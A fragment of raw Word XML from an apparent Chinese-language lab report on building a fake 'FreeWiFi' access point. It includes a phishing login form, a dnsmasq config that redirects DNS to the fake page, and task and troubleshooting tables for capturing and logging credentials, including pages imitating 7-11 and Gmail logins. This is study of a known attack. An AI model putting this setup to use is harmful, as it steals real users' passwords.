          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="488D7F7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&lt;div class="login-box"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7760F99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&lt;h2&gt;Login to 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FreeWiFi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>&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E53D026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&lt;form action="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post.php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>" method="post"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506527EE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&lt;input type="text" name="username" placeholder="Username" required&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B9C567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&lt;input type="password" name="password" placeholder="Password" required&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D6E87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&lt;button type="submit"&gt;Login&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A20F1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&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F293BEB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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEC956B" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="003646DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E2CE4D7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&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B53E411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&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6169D1" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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>功能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20256AB1" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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這個 HTML 表單會捕捉使用者的帳號與密碼，並透過 POST 方法提交到 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post.php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 xml:space="preserve"> 進行處理。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567AD421" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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lastRenderedPageBreak/>
        <w:t>設計簡單、直觀，用戶會將其視為合法的登入頁面。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4128C8EF" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="003646DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54B15596" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:b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>3.dnsmasq.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322D3063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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>dnsmasq.conf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 xml:space="preserve"> 是 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dnsmasq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 xml:space="preserve"> 的配置檔，設置了 DHCP 和 DNS 伺服器，將所有流量導向假網站（在這個例子中是 192.168.168.1，即你的假登入頁）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA61817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interface=wlan0mon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F6E0D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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>dhcp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>-range=192.168.168.2,192.168.168.10,12h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1C00E1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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>dhcp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>-option=3,192.168.168.1  # 網關設為假登入頁的 IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5A85BD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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>dhcp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>-option=6,192.168.168.1  # DNS 指向假登入頁</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC980D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address=/google.com/192.168.168.1  # 所有網頁重定向至假登入頁</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0361C35B" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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>功能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58903374" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>dnsmasq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 xml:space="preserve"> 配置文件設置了 DHCP 範圍，使得接入 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FreeWiFi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 xml:space="preserve"> 的設備能夠自動分配 IP 地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F12C83A" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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任何試圖訪問網站的設備將會被重定向到 192.168.168.1（即你的假登入頁），這樣可以捕獲用戶的登入資訊。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E981FCD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2D08E74C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>實驗圖片：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499E10C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1.SSID「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FreeWiFi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>」廣播畫面與假登入頁面顯示畫面（login.html）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF63E51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0" distB="0" distL="0" distR="0" wp14:anchorId="67B9868D" wp14:editId="536BC10A">
            <wp:extent cx="976313" cy="2106780"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="183543409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313" cy="2106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</w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w: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67D97319" wp14:editId="1C217773">
            <wp:extent cx="975600" cy="2106000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="183543409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5600" cy="210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color w:val="141823"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AF049CC" wp14:editId="7F4BFAD6">
            <wp:extent cx="5274000" cy="2833200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="183543409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180B8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7E73DDC5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3E0FC0FB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7D6B451B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2.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>logs.txt 記錄結果截圖</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17471A8B" w14:textId="77777777" w:rsidR="003646DE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20E2DAE1" wp14:editId="39F3BC63">
            <wp:extent cx="5274000" cy="2832100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="183543409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1F22F" w14:textId="77777777" w:rsidR="003646DE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68EE2DA" wp14:editId="42A1AA93">
            <wp:extent cx="5274000" cy="2832100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="183543409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4A495" w14:textId="77777777" w:rsidR="003646DE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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F199A06" wp14:editId="2436C31B">
            <wp:extent cx="5274310" cy="2834640"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="183543409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AA1BF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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63E79E00" wp14:editId="47A552DF">
            <wp:extent cx="2104707" cy="1578531"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="183543409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04707" cy="1578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C1060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569D139B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63060E41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7A5DB17F" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="003646DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="776F45D3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>七、 工作分配與預定進度甘梯圖</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D6B70D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tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:topFromText="180" w:bottomFromText="180" w:vertAnchor="text" w:tblpX="15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73"/>
        <w:gridCol w:w="620"/>
        <w:gridCol w:w="1366"/>
        <w:gridCol w:w="3737"/>
      </w:tblGrid>
      <w:tr w:rsidR="003646DE" w14:paraId="2DA1910E" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2573" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="023929E5" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl/>
              <w:ind w:left="720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lastRenderedPageBreak/>
              <w:t>工作項目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="620" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6608E433" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl/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負責人</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1366" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7E27573B" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl/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完成日期日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3737" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="464A5B68" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl/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說明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003646DE" w14:paraId="3636FCEE" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2573" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2A468B9F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1. Fake AP 架設測試</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="620" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F671BD0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1366" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="61A2FE96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2025/06/17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3737" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="450D9C6E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使用 airbase-ng 廣播 SSID 並驗證裝置可連線</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003646DE" w14:paraId="57FA2EDF" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2573" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="76920F8C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2. 登入頁面製作</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="620" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5C6B6CF0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1366" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="203F0F6D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2025/06/17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3737" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2E3F9314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設計 login.html 介面模仿 7-11 / Gmail 登入頁</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003646DE" w14:paraId="789CC542" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2573" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="33E4FB3A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3. 帳密接收與紀錄（</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>post.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="620" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7286AE38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1366" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="33D6857E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2025/06/17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3737" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="47CC0306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寫入 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>post.php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接收帳密並記錄 logs.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003646DE" w14:paraId="1B7D1003" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2573" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="31486B24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4. </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>dnsmasq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+ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>apache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整合</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="620" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="424308CA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1366" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="20B4F684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2025/06/17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3737" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5961E438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整合 DHCP + Web Server 提供完整體驗</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003646DE" w14:paraId="40DCBA3B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2573" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="27DC0A80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5. 實驗流程測試與帳密驗證</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="620" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3F8B87F3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1366" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="66EB38A3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2025/06/17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3737" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="68E8AA5E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使用手機測試連線、輸入帳密並驗證是否記錄成功</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003646DE" w14:paraId="3D8FB1FA" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2573" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6EE13A5B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6. 報告撰寫與簡報製作</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="620" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5188957E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1366" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7FDBD3EB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2025/06/17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3737" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2F5DD3B6" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl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完成 PDF 簡報、流程圖與甘特圖成果整理</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4CAB9AE3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6E61D2D9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八、 遭遇問題與解決方案 </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af4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31"/>
        <w:gridCol w:w="3965"/>
      </w:tblGrid>
      <w:tr w:rsidR="003646DE" w14:paraId="313FE405" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4331" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="39E2CD9D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b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遭遇問題描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3965" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4CF6C066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b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解決方式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003646DE" w14:paraId="25E7451E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4331" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7B1B5AEC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USB 網卡無法啟用 AP 模式，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hostapd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 顯示 "driver initialization failed"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3965" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="637BF808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改用 airbase-ng 利用 monitor mode 模擬 AP，繞過 AP 模式限制</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003646DE" w14:paraId="769A82EC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4331" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="34534D31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airbase-ng 啟動後無法提供 DHCP 與登入頁</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3965" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7AC51A9A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使用 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dnsmasq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 設定 at0 介面提供 DHCP 與 DNS，並搭配 Apache 顯示登入頁</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003646DE" w14:paraId="2B82F17F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4331" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="209D970A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post.php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 無法記錄帳密或權限錯誤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3965" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="58B8257C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加入 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chmod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 666 logs.txt 讓 Apache 有寫入權限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003646DE" w14:paraId="21CB92B0" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4331" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="59775ABE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使用者連線後未自動跳轉登入頁</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3965" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="52E12169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加入 DNS 偽導與伺服器首頁設為 index.html 模擬 Captive Portal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003646DE" w14:paraId="727EB9B5" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4331" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="19C71FBD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登入頁顯示亂碼或儲存失敗</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3965" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0719592D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確認 Apache 使用 UTF-8 並正確設定 PHP POST 欄位接收格式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="02A754F6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</w:p>
    <w:p w14:paraId="68730CC0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</w:p>
    <w:p w14:paraId="20BD021D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</w:p>
    <w:p w14:paraId="0E06CD48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</w:p>
    <w:p w14:paraId="35FE0638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</w:p>
    <w:p w14:paraId="6D415B9F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</w:p>
    <w:p w14:paraId="7F64D553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141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A58C703" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="003646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highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AD7B3A8" w14:textId="77777777" w:rsidR="003646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 xml:space="preserve">九、 儀器設備需求表 </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af5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9"/>
        <w:gridCol w:w="3761"/>
        <w:gridCol w:w="2646"/>
      </w:tblGrid>
      <w:tr w:rsidR="003646DE" w14:paraId="21AF60AF" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1889" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6013E748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b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項目名稱</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3761" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="769C9849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b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規格/版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2646" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="708B0E45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b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用途說明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003646DE" w14:paraId="2262413E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1889" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="601CD78A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作業系統</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3761" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4D85AB4A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Kali Linux 2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2646" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1C090DC7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實驗平台，內建攻</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
                <w:color w:val="141823"/>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>擊工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003646DE" w14:paraId="47A693B5" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1889" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2E6DB8F9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lastRenderedPageBreak/>
              <w:t>USB 無線網卡</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3761" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="425DECF1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Realtek RTL88x2BU（支援 monitor）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2646" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2857B424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廣播假 AP 訊號</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003646DE" w14:paraId="444115A6" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1889" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5C7D5D4B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Apache2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3761" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5070FE95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v2.4.x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2646" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="19E36908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顯示登入頁與接收帳密</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003646DE" w14:paraId="5E564942" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1889" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0FE84E8F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dnsmasq</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3761" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5E1A81D7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v2.89</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2646" w:type="dxa"/>
